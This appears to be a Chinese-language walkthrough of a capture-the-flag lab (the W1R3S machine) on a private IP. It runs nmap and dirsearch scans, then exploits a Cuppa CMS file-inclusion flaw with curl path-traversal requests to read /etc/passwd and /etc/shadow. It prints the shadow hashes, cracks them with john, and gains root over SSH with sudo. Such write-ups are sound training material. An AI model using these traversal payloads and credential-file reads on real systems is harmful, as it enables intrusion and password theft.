一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
nmap 192.168.236.160 -p- -A
3、目录扫描
dirsearch -u http://192.168.236.160
二、漏洞探测
步骤一:访问80端口,拼接访问 /administrator ,发现使用了Cuppa CMS
步骤二:查找历史漏洞,发现有文件包含漏洞
searchsploit cuppa
三、GetShell
步骤一:查看内容,提示 /alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件
searchsploit -m php/webapps/25971.txt
cat 25971.txt
步骤二:访问 /etc/passwd 文件,没有显示信息,可能需要post访问,使用curl工具以post方式获取信息
http://192.168.236.160/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.236.160/administrator/alerts/alertConfigField.php
步骤三:在文件中发现了 w1r3s 用户,用同样的方法获取保存密码的shadow文件试试
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.236.160/administrator/alerts/alertConfigField.php
步骤四:发现了 root 、www-data 、w1r3s 用户的密码,尝试用 john 破解
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.
john pwd.txt
# 得到密码
www-data:www-data(/usr/sbin/noglogin 不能登录)
w1r3s:computer
步骤五:通过 ssh 远程连接 w1r3s 用户
四、提权
使用 sudo su ,输入密码可直接提权